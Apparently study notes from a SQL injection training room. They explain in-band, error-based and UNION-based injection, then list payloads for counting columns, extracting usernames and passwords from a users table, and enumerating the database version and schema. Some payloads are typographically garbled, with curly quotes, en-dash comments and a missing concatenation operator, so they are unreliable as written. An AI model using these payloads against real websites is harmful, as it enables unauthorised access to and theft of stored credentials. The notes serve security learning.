A database is a way of electronically storing collections of data in an organised manner. A database is controlled by a DBMS which is an acronym for Database Management System, DBMS’s fall into two camps Relational or Non-Relational, the focus of this room will be on Relational databases, some common one’s you’ll come across are MySQL, Microsoft SQL Server, Access, PostgreSQL and SQLite.
SQL (Structured Query Language) is a feature-rich language used for querying databases, these SQL queries are better referred to as statements.
The point wherein a web application using SQL can turn into SQL Injection is when user-provided data gets included in the SQL query.
In-Band SQL Injection is the easiest type to detect and exploit; In-Band just refers to the same method of communication being used to exploit the vulnerability and also receive the results, for example, discovering an SQL Injection vulnerability on a website page and then being able to extract data from the database to the same page.
This type of SQL Injection is the most useful for easily obtaining information about the database structure as error messages from the database are printed directly to the browser screen. This can often be used to enumerate a whole database.
This type of Injection utilises the SQL UNION operator alongside a SELECT statement to return additional results to the page. This method is the most common way of extracting large amounts of data via an SQL Injection vulnerability.
There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:
SQL injection UNION attacks
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
Determining the number of columns required in an SQL injection UNION attack
’ ORDER BY 1– ‘ ORDER BY 2– ‘ ORDER BY 3– etc.
’ UNION SELECT NULL– ‘ UNION SELECT NULL,NULL– ‘ UNION SELECT NULL,NULL,NULL– etc.
Finding columns with a useful data type in an SQL injection UNION attack
’ UNION SELECT ‘a’,NULL,NULL,NULL– ‘ UNION SELECT NULL,’a’,NULL,NULL– ‘ UNION SELECT NULL,NULL,’a’,NULL– ‘ UNION SELECT NULL,NULL,NULL,’a’–
Using an SQL injection UNION attack to retrieve interesting data
’ UNION SELECT username, password FROM users–
Retrieving multiple values within a single column
’ UNION SELECT username ’~’ password FROM users–
Retrieving data from other database tables
SELECT * FROM v$version SELECT * FROM information_schema.tables
Querying the database type and version
Microsoft, MySQL SELECT @@version Oracle SELECT * FROM v$version PostgreSQL SELECT version() For example, you could use a UNION attack with the following input: ‘ UNION SELECT @@version–
Listing the contents of the database
Non oracle: SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = ‘Users’ Oracle : SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = ‘USERS’